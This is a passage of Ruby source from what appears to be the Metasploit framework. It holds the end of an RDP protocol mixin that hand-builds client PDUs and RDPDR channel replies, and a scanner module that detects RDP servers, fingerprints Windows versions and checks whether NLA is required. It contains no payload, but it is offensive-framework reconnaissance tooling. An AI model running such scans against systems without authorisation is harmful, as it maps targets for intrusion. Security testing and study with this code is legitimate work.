 778 |     "\x00\x00\x00\x00" +    # CodePage
 779 |       "\x33\x01\x00\x00" +  # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
 780 |       [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
 781 |       [uname_len].pack("S<") +  # cbUserName (length value) - EXCLUDES null terminator
 782 |       "\x00\x00" +  # cbPassword (length value)
 783 |       "\x00\x00" +  # cbAlternateShell (length value)
 784 |       "\x00\x00" +  # cbWorkingDir (length value)
 785 |       [domain_unicode].pack("a*") + # Domain
 786 |       "\x00\x00" +                  # Domain null terminator, EXCLUDED from value of cbDomain
 787 |       [user_unicode].pack("a*") +   # UserName
 788 |       "\x00\x00" +  # UserName null terminator, EXCLUDED FROM value of cbUserName
 789 |       "\x00\x00" +  # Password - empty
 790 |       "\x00\x00" +  # AlternateShell - empty
 791 |       "\x00\x00" +  # WorkingDir - empty
 792 |       # TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
 793 |       "\x02\x00" +              # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
 794 |       [ip_len].pack("S<") +     # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
 795 |       [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
 796 |       "\x3c\x00" +              # cbClientDir (length value): 60
 797 |       # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
 798 |       "\x3c\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00" + #
 799 |       "\x54\x00\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00" + #
 800 |       "\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00" + #
 801 |       "\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" + #
 802 |       # clientTimeZone - TS_TIME_ZONE struct - 172 bytes
 803 |       # These are the default values for rdesktop
 804 |       "\xa4\x01\x00\x00" + # Bias
 805 |       # StandardName - 'GTB,normaltid'
 806 |       "\x47\x00\x54\x00\x42\x00\x2c\x00\x20\x00\x6e\x00\x6f\x00\x72\x00" + #
 807 |       "\x6d\x00\x61\x00\x6c\x00\x74\x00\x69\x00\x64\x00\x00\x00\x00\x00" + #
 808 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 809 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 810 |       "\x00\x00\x0a\x00\x00\x00\x05\x00\x03\x00\x00\x00\x00\x00\x00\x00" + # StandardDate - Oct 5
 811 |       "\x00\x00\x00\x00" + # StandardBias
 812 |       # DaylightName - 'GTB,sommartid'
 813 |       "\x47\x00\x54\x00\x42\x00\x2c\x00\x20\x00\x73\x00\x6f\x00\x6d\x00" + #
 814 |       "\x6d\x00\x61\x00\x72\x00\x74\x00\x69\x00\x64\x00\x00\x00\x00\x00" + #
 815 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 816 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 817 |       "\x00\x00\x03\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate - Mar 3
 818 |       "\xc4\xff\xff\xff" + # DaylightBias
 819 |       "\x00\x00\x00\x00" + # clientSessionId
 820 |       "\x27\x00\x00\x00" + # performanceFlags
 821 |       "\x00\x00"           # cbAutoReconnectCookie
 822 |   end
 823 | 
 824 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
 825 |   # Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
 826 |   def build_share_control_header(type, data)
 827 |     total_len = data.length + 6
 828 | 
 829 |     [total_len].pack("S<") + # totalLength - includes all headers
 830 |       [type].pack("S<") +    # pduType - flags 16 bit, unsigned
 831 |       "\xf1\x03" +           # PDUSource: 0x03f1 = 1009
 832 |       data
 833 |   end
 834 | 
 835 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
 836 |   # Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
 837 |   def build_share_data_header(type, data)
 838 |     uncompressed_len = data.length + 4
 839 | 
 840 |     "\xea\x03\x01\x00" + # shareId: 66538
 841 |       "\x00" +     # pad1
 842 |       "\x01" +     # streamID: 1
 843 |       [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
 844 |       [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
 845 |       "\x00" +     # compressedType: 0
 846 |       "\x00\x00" + # compressedLength: 0
 847 |       data
 848 |   end
 849 | 
 850 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
 851 |   # Control Cooperate - TC_CONTROL_PDU 2.2.1.15
 852 |   def pdu_client_control_cooperate
 853 |     pdu =
 854 |       "\x04\x00" +       # action: 4 - CTRLACTION_COOPERATE
 855 |       "\x00\x00" +       # grantId: 0
 856 |       "\x00\x00\x00\x00" # controlId: 0
 857 | 
 858 |     # pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
 859 |     data_header = build_share_data_header(0x14, pdu)
 860 | 
 861 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
 862 |     build_share_control_header(0x17, data_header)
 863 |   end
 864 | 
 865 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
 866 |   # Control Request - TC_CONTROL_PDU 2.2.1.16
 867 |   def pdu_client_control_request
 868 |     pdu =
 869 |       "\x01\x00" +       # action: 1 - CTRLACTION_REQUEST_CONTROL
 870 |       "\x00\x00" +       # grantId: 0
 871 |       "\x00\x00\x00\x00" # controlId: 0
 872 | 
 873 |     # pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
 874 |     data_header = build_share_data_header(0x14, pdu)
 875 | 
 876 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
 877 |     build_share_control_header(0x17, data_header)
 878 |   end
 879 | 
 880 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
 881 |   # Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
 882 |   def pdu_client_font_list
 883 |     pdu =
 884 |       "\x00\x00" + # numberFonts: 0
 885 |       "\x00\x00" + # totalNumberFonts: 0
 886 |       "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
 887 |       "\x32\x00"   # entrySize: 50
 888 | 
 889 |     # pduType2 = 0x27 = 29 -  PDUTYPE2_FONTLIST
 890 |     data_header = build_share_data_header(0x27, pdu)
 891 | 
 892 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
 893 |     build_share_control_header(0x17, data_header)
 894 |   end
 895 | 
 896 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
 897 |   # Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 /  2.2.14.1
 898 |   def pdu_client_synchronize(target_user = 0)
 899 |     pdu =
 900 |       "\x01\x00" +              # messageType: 1 SYNCMSGTYPE_SYNC
 901 |       [target_user].pack("S<")  # targetUser, 16 bit, unsigned.
 902 | 
 903 |     # pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
 904 |     data_header = build_share_data_header(0x1f, pdu)
 905 | 
 906 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
 907 |     build_share_control_header(0x17, data_header)
 908 |   end
 909 | 
 910 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
 911 |   # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
 912 |   def pdu_client_confirm_active
 913 |     pdu =
 914 |       "\xea\x03\x01\x00" + # shareId: 66538
 915 |       "\xea\x03" + # originatorId
 916 |       "\x06\x00" + # lengthSourceDescriptor: 6
 917 |       "\x8e\x01" + # lengthCombinedCapabilities: 398
 918 |       "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
 919 |       "\x0e\x00" + # numberCapabilities: 14
 920 |       "\x00\x00" + # pad2Octets
 921 |       "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
 922 |       "\x18\x00" + # lengthCapability: 24
 923 |       "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x0d\x04\x00\x00\x00\x00" + #
 924 |       "\x00\x00\x00\x00" + #
 925 |       "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
 926 |       "\x1c\x00" + # lengthCapability: 28
 927 |       "\x10\x00\x01\x00\x01\x00\x01\x00\x20\x03\x58\x02\x00\x00\x01\x00" + #
 928 |       "\x01\x00\x00\x00\x01\x00\x00\x00" + #
 929 |       "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
 930 |       "\x58\x00" + # lengthCapability: 88
 931 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 932 |       "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x47\x01\x2a\x00" + #
 933 |       "\x01\x01\x01\x01\x00\x00\x00\x00\x01\x01\x01\x01\x00\x01\x01\x00" + #
 934 |       "\x00\x00\x00\x00\x01\x01\x01\x00\x00\x01\x01\x01\x00\x00\x00\x00" + #
 935 |       "\xa1\x06\x00\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" + #
 936 |       "\xe4\x04\x00\x00\x13\x00\x28\x00\x00\x00\x00\x03\x78\x00\x00\x00" + #
 937 |       "\x78\x00\x00\x00\x50\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 938 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 939 |       "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
 940 |       "\x0a\x00" + # lengthCapability: 10
 941 |       "\x01\x00\x14\x00\x14\x00" + #
 942 |       "\x0a\x00" + # capabilitySetType: 10 - TS_COLORTABLE_CAPABILITYSET
 943 |       "\x08\x00" + # lengthCapability: 8
 944 |       "\x06\x00\x00\x00" + #
 945 |       "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
 946 |       "\x0c\x00" + # lengthCapability: 12
 947 |       "\x00\x00\x00\x00\x00\x00\x00\x00" + #
 948 |       "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
 949 |       "\x0c\x00" + # lengthCapability: 12
 950 |       "\x00\x00\x00\x00\x02\x00\x02\x00" + #
 951 |       "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
 952 |       "\x08\x00" + # lengthCapability: 8
 953 |       "\x00\x00\x00\x00" + #
 954 |       "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
 955 |       "\x08\x00" + # lengthCapability: 8
 956 |       "\x01\x00\x00\x00" + #
 957 |       "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
 958 |       "\x58\x00" + # lengthCapability: 88
 959 |       "\x01\x00\x00\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" + #
 960 |       "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 961 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 962 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 963 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 964 |       "\x00\x00\x00\x00" + #
 965 |       "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
 966 |       "\x08\x00" + # lengthCapability: 8
 967 |       "\x01\x00\x00\x00" + #
 968 |       "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
 969 |       "\x08\x00" + # lengthCapability: 8
 970 |       "\x01\x00\x00\x00" + #
 971 |       "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
 972 |       "\x34\x00" + # lengthCapability: 52
 973 |       "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" + #
 974 |       "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" + #
 975 |       "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x02\x00\x00\x00"
 976 | 
 977 |     # type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
 978 |     build_share_control_header(0x13, pdu)
 979 |   end
 980 | 
 981 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
 982 |   # Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
 983 |   def pdu_client_input_event_sychronize
 984 |     pdu =
 985 |       "\x01\x00" +         # numEvents: 1
 986 |       "\x00\x00" +         # pad2Octets
 987 |       "\x00\x00\x00\x00" + # eventTime
 988 |       "\x00\x00" +         # messageType: 0 - INPUT_EVENT_SYNC
 989 |       # TS_SYNC_EVENT 202.8.1.1.3.1.1.5
 990 |       "\x00\x00" +         # pad2Octets
 991 |       "\x00\x00\x00\x00"   # toggleFlags
 992 | 
 993 |     # pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
 994 |     data_header = build_share_data_header(0x1c, pdu)
 995 | 
 996 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
 997 |     build_share_control_header(0x17, data_header)
 998 |   end
 999 | 
1000 |   #
1001 |   # Non-RDP protocol helper methods
1002 |   #
1003 | 
1004 |   # Create a new SSL session on the existing socket.
1005 |   # Stolen from exploit/smtp_deliver.rb
1006 |   def swap_sock_plain_to_ssl
1007 |     ctx = OpenSSL::SSL::SSLContext.new
1008 |     ctx.min_version = OpenSSL::SSL::TLS1_VERSION
1009 |     ssl = OpenSSL::SSL::SSLSocket.new(self.rdp_sock, ctx)
1010 | 
1011 |     ssl.connect
1012 | 
1013 |     self.rdp_sock.extend(Rex::Socket::SslTcp)
1014 |     self.rdp_sock.sslsock = ssl
1015 |     self.rdp_sock.sslctx  = ctx
1016 |   end
1017 | 
1018 | protected
1019 | 
1020 |   def encode_domain_selector(
1021 |     max_chan_ids: 0,
1022 |     max_user_ids: 0,
1023 |     max_token_ids: 0,
1024 |     num_priorities: 1,
1025 |     min_throughput: 0,
1026 |     max_height: 1,
1027 |     max_mcspdu_size: 65535,
1028 |     protocol_ver: 2
1029 |   )
1030 | 
1031 |     body = [
1032 |       ber_int(max_chan_ids),
1033 |       ber_int(max_user_ids),
1034 |       ber_int(max_token_ids),
1035 |       ber_int(num_priorities),
1036 |       ber_int(min_throughput),
1037 |       ber_int(max_height),
1038 |       ber_int(max_mcspdu_size),
1039 |       ber_int(protocol_ver)
1040 |     ].join('')
1041 | 
1042 |     result = [
1043 |       "\x30",
1044 |       [body.length].pack('C'),
1045 |       body
1046 |     ].join('')
1047 | 
1048 |     result
1049 |   end
1050 | 
1051 |   def per_object(*ds)
1052 |     body = ds.join('')
1053 | 
1054 |     result = [
1055 |       "\x00",
1056 |       [body.length].pack('C'),
1057 |       body
1058 |     ].join('')
1059 | 
1060 |     result
1061 |   end
1062 | 
1063 |   def per_data(*ds)
1064 |     data = ds.join('')
1065 |     result = ''
1066 |     if data.length < 0x4000
1067 |       result = [data.length | 0x8000].pack('S>') + data
1068 |     else
1069 |       result = "\xA2" + [data.length].pack('S>') + data
1070 |     end
1071 | 
1072 |     result
1073 |   end
1074 | 
1075 |   def cs_cluster_data(
1076 |     flags: RDPConstants::REDIRECTION_SUPPORTED | RDPConstants::REDIRECTION_VERSION3,
1077 |     session_id: 0
1078 |   )
1079 |     body = [flags, session_id].pack('<L<L')
1080 | 
1081 |     result = [
1082 |       [0xc004, body.length + 4].pack('<S<S'),
1083 |       body
1084 |     ].join('')
1085 | 
1086 |     result
1087 |   end
1088 | 
1089 |   def cs_security_data(
1090 |     encryption_methods: RDPConstants::ENCRYPTION_40BIT | RDPConstants::ENCRYPTION_128BIT,
1091 |     ext_encryption_methods: 0
1092 |   )
1093 |     body = [encryption_methods, ext_encryption_methods].pack('<L<L')
1094 | 
1095 |     result = [
1096 |       [0xc002, body.length + 4].pack('<S<S'),
1097 |       body
1098 |     ].join('')
1099 | 
1100 |     result
1101 |   end
1102 | 
1103 |   def cs_network_data(channels)
1104 |     chan_data = channels.map{ |c|
1105 |       [c[0].encode('ASCII')].pack('a8*') + [c[1]].pack('L')
1106 |     }.join('')
1107 | 
1108 |     body = [
1109 |       [channels.length].pack('L'),
1110 |       chan_data
1111 |     ].join('')
1112 | 
1113 |     result = [
1114 |       [0xc003, body.length + 4].pack('<S<S'),
1115 |       body
1116 |     ].join('')
1117 | 
1118 |     result
1119 |   end
1120 | 
1121 | 
1122 |   def cs_core_data(
1123 |     version: 0x80004,
1124 |     width: 800,
1125 |     height: 600,
1126 |     keyboard: 1033, # English
1127 |     client_build: 2600,
1128 |     client_name: "rdesktop",
1129 |     keyboard_type: 4, # IBMEhanced 101/102
1130 |     keyboard_subtype: 0,
1131 |     keyboard_func_key: 12,
1132 |     serial_num: 0,
1133 |     client_product_id: 1,
1134 |     client_dig_product_id: "",
1135 |     selected_proto: 0
1136 |   )
1137 | 
1138 |     client_name = Rex::Text.to_unicode(client_name[0..16], 'utf-16le')
1139 |     client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')
1140 | 
1141 |     body = [
1142 |       [version, width, height].pack('<L<S<S'),
1143 |       "\x01\xca", # colour depth (8BPP)
1144 |       "\x03\xaa", # SASSequence
1145 |       [keyboard, client_build, client_name, keyboard_type].pack('<L<La32*'),
1146 |       [keyboard_type, keyboard_subtype, keyboard_func_key].pack('<L<L<L'),
1147 |       "\x00" * 64, # imeFileName
1148 |       "\x01\xca", # postBeta2ColorDepth (8BPP)
1149 |       [client_product_id, serial_num].pack('<S<L'),
1150 |       "\x18\x00", # highColorDepth: 24 bpp
1151 |       "\x07\x00", # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp )
1152 |       "\x01\x00", # earlyCapabilityFlags: 1 (RNS_UD_CS_SUPPORT_ERRINFO_PDU)
1153 |       [client_dig_product_id].pack('a64*'),
1154 |       "\x00", # connectionType: 0
1155 |       "\x00", # pad1octet
1156 |       # serverSelectedProtocol - After negotiating TLS or CredSSP this value must
1157 |       # match the selectedProtocol value from the server's Negotiate Connection
1158 |       # confirm PDU that was sent before encryption was started.
1159 |       [selected_proto].pack('L<')
1160 |     ].join('')
1161 | 
1162 |     result = [
1163 |       [0xc001, body.length + 4].pack('<S<S'),
1164 |       body
1165 |     ].join('')
1166 | 
1167 |     result
1168 |   end
1169 | 
1170 |   def conf_create_req(user_data_sets: 1, h221_key: "Duca")
1171 |     b2 = 0
1172 |     b2 |= 0x08 if user_data_sets > 0
1173 | 
1174 |     b5 = 0x40
1175 |     b5 |= 0x80 if user_data_sets > 0
1176 | 
1177 |     # TODO: add more flags here
1178 |     [
1179 |       "\x00",
1180 |       [b2].pack('C'),
1181 |       "\x00\x10\x00",
1182 |       [user_data_sets].pack('C'),
1183 |       [b5].pack('C'),
1184 |       "\x00",
1185 |       [h221_key.encode('ASCII')].pack('a*')
1186 |     ].join('')
1187 |   end
1188 | 
1189 |   def oid(itut, rec, t, t124, ver, desc)
1190 |     [(itut << 8) | rec, t, t124, ver, desc].pack('C*')
1191 |   end
1192 | 
1193 |   def ber_octet_string(*ds)
1194 |     result = [
1195 |       "\x04",
1196 |       ber_data(ds)
1197 |     ].join('')
1198 | 
1199 |     result
1200 |   end
1201 | 
1202 |   def ber_data(*ds)
1203 |     data = ds.join('')
1204 | 
1205 |     result = [
1206 |       "\x82",
1207 |       [data.length].pack('S>'),
1208 |       data
1209 |     ].join('')
1210 | 
1211 |     result
1212 |   end
1213 | 
1214 |   def ber_int(i)
1215 |     d = ''
1216 |     if i < (2 ** 8)
1217 |       d = [i].pack('C')
1218 |     elsif i < (2 ** 16)
1219 |       d = [i].pack('S>')
1220 |     else
1221 |       d = [i].pack('L>')
1222 |     end
1223 | 
1224 |     "\x02" + [d.length].pack('C') + d
1225 |   end
1226 | 
1227 |   def rdp_handle_packet(pkt)
1228 |     if pkt && pkt[0] == "\x03"
1229 |       if pkt[4..6] == "\x02\xf0\x80"
1230 |         if pkt[7] == "\x68"
1231 |           chan_user_id = pkt[8..9].unpack('S>')[0]
1232 |           chan_id = pkt[10..11].unpack('S>')[0]
1233 |           flags = pkt[18..21].unpack('<L')[0]
1234 |           data = pkt[22..pkt.length]
1235 |           rdp_on_channel_receive(pkt, chan_user_id, chan_id, flags, data)
1236 |         end
1237 |       end
1238 |     end
1239 |   end
1240 | 
1241 |   def rdp_on_channel_receive(pkt, chan_user_id, chan_id, flags, data)
1242 |     ctype = data[0..1].unpack('S')[0]
1243 | 
1244 |     if ctype == RDPConstants::RDPDR_CTYP_CORE
1245 |       opcode = data[2..3].unpack('S')[0]
1246 |       if opcode == RDPConstants::PAKID_CORE_SERVER_ANNOUNCE
1247 |         rdp_on_core_server_announce(pkt, chan_user_id, chan_id, flags, data)
1248 |       elsif opcode == RDPConstants::PAKID_CORE_SERVER_CAPABILITY
1249 |         rdp_on_core_server_capability(pkt, chan_user_id, chan_id, flags, data)
1250 |       elsif opcode == RDPConstants::PAKID_CORE_CLIENTID_CONFIRM
1251 |         rdp_on_core_client_id_confirm(pkt, chan_user_id, chan_id, flags, data)
1252 |       end
1253 |     end
1254 |   end
1255 | 
1256 |   def rdp_on_core_server_announce(pkt, chan_user_id, chan_id, flags, data)
1257 |     vprint_status("Handling SERVER ANNOUNCE ...")
1258 |     rdpdr_client_announce_reply(pkt, chan_user_id, chan_id, flags, data)
1259 |     rdpdr_client_name_request(pkt, chan_user_id, chan_id, flags, data)
1260 |   end
1261 | 
1262 |   def rdp_on_core_server_capability(pkt, chan_user_id, chan_id, flags, data)
1263 |     vprint_status("Handling SERVER CAPABILITY ...")
1264 |     # change opcode 1 byte to match server capabilities
1265 |     reply = [data[0..2], "\x43", data[4..data.length]].join('')
1266 | 
1267 |     rdp_send_channel(chan_user_id, chan_id, reply)
1268 |   end
1269 | 
1270 |   def rdp_on_core_client_id_confirm(pkt, chan_user_id, chan_id, flags, data)
1271 |     vprint_status("Handling CLIENT ID CONFIRM ...")
1272 |     rdpdr_client_device_list_announce_request(pkt, chan_user_id, chan_id, flags, data)
1273 |   end
1274 | 
1275 |   def rdpdr_client_device_list_announce_request(pkt, chan_user_id, chan_id, flags, data)
1276 |     reply = [
1277 |       RDPConstants::RDPDR_CTYP_CORE,
1278 |       RDPConstants::PAKID_CORE_DEVICELIST_ANNOUNCE,
1279 |       0x0, # Device count
1280 |     ].pack('SSL')
1281 | 
1282 |     rdp_send_channel(chan_user_id, chan_id, reply)
1283 |   end
1284 | 
1285 |   def rdpdr_client_announce_reply(pkt, chan_user_id, chan_id, flags, data)
1286 |     reply = [
1287 |       RDPConstants::RDPDR_CTYP_CORE,
1288 |       RDPConstants::PAKID_CORE_CLIENTID_CONFIRM,
1289 |       0x1, # Version Major
1290 |       0xc, # Version Minor
1291 |       0x2, # client ID (TODO: configure this? read it from the packet?
1292 |     ].pack('SSSSL')
1293 | 
1294 |     rdp_send_channel(chan_user_id, chan_id, reply)
1295 |   end
1296 | 
1297 |   def rdpdr_client_name_request(pkt, chan_user_id, chan_id, flags, data)
1298 |     computer_name = Rex::Text.to_unicode("ethdev\x00", 'utf-16le')
1299 |     reply = [
1300 |       RDPConstants::RDPDR_CTYP_CORE,
1301 |       RDPConstants::PAKID_CORE_CLIENT_NAME,
1302 |       0x1, # Unicode flag
1303 |       0x0, # Code Page
1304 |       computer_name.length,
1305 |       computer_name,
1306 |     ].pack('SSLLLa*')
1307 | 
1308 |     rdp_send_channel(chan_user_id, chan_id, reply)
1309 |   end
1310 | 
1311 |   attr_accessor :rdp_sock
1312 | 
1313 |   attr_accessor :rdp_user_id
1314 | 
1315 | =begin
1316 |   # debug stuff
1317 |   def rdp_to_file(b, del = false)
1318 |     p = "/tmp/ruby-full.bin"
1319 |     ::File.delete(p) if del && ::File.exist?(p)
1320 |     f = ::File.new(p, "ab")
1321 |     f.write(b)
1322 |     f.close
1323 |   end
1324 | =end
1325 | 
1326 | end
1327 | end
1328 | 
1329 | 


--------------------------------------------------------------------------------
/rdp_scanner.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: https://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | class MetasploitModule < Msf::Auxiliary
  7 |   include Msf::Exploit::Remote::RDP
  8 |   include Msf::Auxiliary::Scanner
  9 |   include Msf::Auxiliary::Report
 10 | 
 11 |   def initialize(info = {})
 12 |     super(
 13 |       update_info(
 14 |         info,
 15 |         'Name'           => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)',
 16 |         'Description'    => %q(
 17 |           This module attempts to connect to the specified Remote Desktop Protocol port
 18 |           and determines if it speaks RDP.
 19 | 
 20 |           When available, the Credential Security Support Provider (CredSSP) protocol will be used to identify the
 21 |           version of Windows on which the server is running. Enabling the DETECT_NLA option will cause a second
 22 |           connection to be made to the server to identify if Network Level Authentication (NLA) is required.
 23 |         ),
 24 |         'Author'         => 'Jon Hart <jon_hart[at]rapid7.com>',
 25 |         'References'     =>
 26 |           [
 27 |             ['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']
 28 |           ],
 29 |         'License'        => MSF_LICENSE
 30 |       )
 31 |     )
 32 | 
 33 |     register_options(
 34 |       [
 35 |         Opt::RPORT(3389),
 36 |         OptBool.new('DETECT_NLA', [true, 'Detect Network Level Authentication (NLA)', true])
 37 |       ]
 38 |     )
 39 |   end
 40 | 
 41 |   def check_rdp
 42 |     begin
 43 |       rdp_connect
 44 |       is_rdp, version_info = rdp_fingerprint
 45 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 46 |       return false, nil
 47 |     ensure
 48 |       rdp_disconnect
 49 |     end
 50 | 
 51 |     service_info = nil
 52 |     if is_rdp
 53 |       product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
 54 |       info = "Detected RDP on #{peer} (Windows version: #{product_version})"
 55 | 
 56 |       if datastore['DETECT_NLA']
 57 |         service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla?) ? 'Yes' : 'No'}"
 58 |         info << " (#{service_info})"
 59 |       end
 60 | 
 61 |       print_status(info)
 62 |     end
 63 | 
 64 |     return is_rdp, service_info
 65 |   end
 66 | 
 67 |   def requires_nla?
 68 |     begin
 69 |       rdp_connect
 70 |       is_rdp, server_selected_proto = rdp_check_protocol
 71 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 72 |       return false
 73 |     ensure
 74 |       rdp_disconnect
 75 |     end
 76 | 
 77 |     return false unless is_rdp
 78 |     return [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
 79 |   end
 80 | 
 81 |   def run_host(_ip)
 82 |     is_rdp = false
 83 |     begin
 84 |       rdp_connect
 85 |       is_rdp, service_info = check_rdp
 86 |     rescue Rex::ConnectionError => e
 87 |       vprint_error("Error while connecting and negotiating RDP: #{e}")
 88 |       return
 89 |     ensure
 90 |       rdp_disconnect
 91 |     end
 92 |     return unless is_rdp
 93 | 
 94 |     report_service(
 95 |       host: rhost,
 96 |       port: rport,
 97 |       proto: 'tcp',
 98 |       name: 'RDP',
 99 |       info: service_info
100 |     )
101 |   end
102 | end
103 | 
104 | 


--------------------------------------------------------------------------------